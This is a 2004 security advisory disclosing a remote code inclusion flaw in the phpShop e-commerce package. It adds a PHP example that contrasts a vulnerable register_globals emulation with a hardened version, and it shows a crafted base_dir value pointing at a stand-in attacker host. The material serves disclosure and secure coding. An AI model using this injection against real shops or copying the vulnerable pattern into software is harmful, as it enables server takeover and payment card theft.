
Arbitrary code inclusion in phpShop



A vulnerability has been discovered in the popular E-Commerce package
'phpShop'. The vulnerability's details are available in the attached
advisory, or at http://www.fribble.net/advisories/phpshop_29-04-04.txt

Due to the nature of this vulnerability, I notified the lead programmer
for this package over a week ago, and no reply or patch has yet been
released.

Once again, this is unfortunately another PHP package falling victim to
the 'register globals substitution' vulnerability that many other high-
profile packages have had (phpNuke, phpBB, just to name a couple). When
will people learn that replacing one bad configuration error with an (even
worse!) programming one is NOT the way to migrate into new versions of
PHP.

Regards,

Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
enune@xxxxxxx
http://www.fribble.net
-------------- 29/04/2004 --------------
Security Advisory - Arbitrary code inclusion vulnerability in phpShop

Discovered by: Calum Power [Enune]
Advisory Date: 29/04/2004
Versions Affected: <= 0.7.1
Unaffected versions: None Known (Developer contacted 29/04/04)

Product Description: (From product website)
phpShop is a PHP-based e-commerce application and PHP development framework.
phpShop offers the basic features needed to run a successful e-commerce web
site and to extend its capabilities for multiple purposes.

Summary:
Under certain circumstances, it may be possible to execute arbitrary code in
the context of the web server.


Details:
If PHP is configured (in php.ini, or otherwise) with register_globals turned
off, and the PHP version is 4.1 or later, then a phpShop installation applies
a 'fix' that registers every variable in the HTTP request as a local
(global-scope) variable. One of these variables is '$base_dir', which is used
to declare the base directory of the phpShop installation. If the
aforementioned conditions are met (as they are in most recent default PHP
installations), it is possible to overwrite the $base_dir variable (in a GET,
POST or COOKIE declaration), and taint the many lines of code from
'htdocs/index.php

UPDATE (9/05): It has been discovered that ANY version of PHP with
register_globals turned off is vulnerable to this exploit.


Exploit:
An attacker would only need to create a file called 'phpshop.cfg' inside a
directory called 'etc' on his or her own web server, and craft the base_dir
variable so that it points at that web server. phpShop then includes the
attacker's file into its page, treating the attacker's script as its own
configuration file. It is then possible for the attacker to take control of
the website and/or server, and perform malicious activities at will.
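The pattern described above, written out as an added example (this is illustrative code, not phpShop's own source): a bootstrap that emulates register_globals by copying every request key into a variable, then builds the configuration path from $base_dir, beside a hardened bootstrap that imports only an allow-list of parameters and never derives a file path from client input. The variable name $base_dir and the file name etc/phpshop.cfg come from the advisory; the function names, the allow-listed parameter names and the constructed request are assumptions. The remote include only works because PHP 4 (and PHP 5 before 5.2, which introduced allow_url_include) lets include() fetch a URL whenever allow_url_fopen is on, which was the default.

```php
<?php
// Added example reconstructing the "register_globals substitution" bug
// class, not phpShop's code. Names other than $base_dir and
// etc/phpshop.cfg are assumptions.

// --- Vulnerable pattern ---------------------------------------------------
// Emulates register_globals: every request key becomes a variable in this
// scope, exactly as `foreach ($HTTP_GET_VARS as $k => $v) $$k = $v;` or
// `extract($_REQUEST)` did in many PHP 4 era packages.
function vulnerable_bootstrap(array $request): string
{
    $base_dir = dirname(__DIR__);          // intended default set by the app
    foreach ($request as $key => $value) { // the register_globals "fix"
        $$key = $value;                    // ?base_dir=... clobbers $base_dir
    }
    // In the real bug this is `include($base_dir . '/etc/phpshop.cfg');`.
    // With allow_url_fopen on, a $base_dir of "http://attacker.example"
    // makes PHP fetch and execute the attacker's etc/phpshop.cfg.
    // The path is returned here instead of included so it can be shown.
    return $base_dir . '/etc/phpshop.cfg';
}

// --- Hardened pattern -----------------------------------------------------
// Only known parameters are imported, and the configuration path is built
// from a server-side constant that the client can never influence.
function hardened_bootstrap(array $request, string $install_dir): array
{
    $allowed = ['page', 'product_id'];    // assumed application parameters
    $params  = array_intersect_key($request, array_flip($allowed));

    // realpath() only resolves local filesystem paths, so a URL or a
    // stream wrapper can never become the base directory.
    $base_dir = realpath($install_dir);
    if ($base_dir === false || !is_dir($base_dir)) {
        throw new RuntimeException('install dir is not a local directory');
    }
    $cfg = $base_dir . DIRECTORY_SEPARATOR . 'etc'
         . DIRECTORY_SEPARATOR . 'phpshop.cfg';

    // $params is what the application may read; $cfg is what it includes.
    return ['params' => $params, 'config' => $cfg];
}

// Constructed request, as ?base_dir=http://attacker.example&page=shop would
// arrive in $_REQUEST (or as the same names in a POST body or cookie).
$request = ['base_dir' => 'http://attacker.example', 'page' => 'shop'];

echo "vulnerable includes: ", vulnerable_bootstrap($request), "\n";

$safe = hardened_bootstrap($request, __DIR__);
echo "hardened includes:   ", $safe['config'], "\n";
echo "hardened imported:   ", implode(',', array_keys($safe['params'])), "\n";
```

Running this with `php example.php` shows the vulnerable path pointing at the attacker's host and the hardened path staying under the installation directory, with base_dir silently dropped from the imported parameters. The same check applies to any package that "fixed" register_globals=off by re-registering request variables: audit every include, require and fopen for a path component that can be reached from that loop.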


Impact:
The impact of this vulnerability could be quite devastating for companies
who rely on the security of packages such as phpShop to run their businesses
online. Possible ramifications include redirecting customer deliveries to an
address the attacker controls, or hijacking credit card details.

Thanks:
Greets to Mjec on freenode.net#php, rAchel from IdleThink, the guys at Phrack,
and DI Michael Grant from the Tasmanian Fraud Investigation Squad. Censorship
r0x my s0x.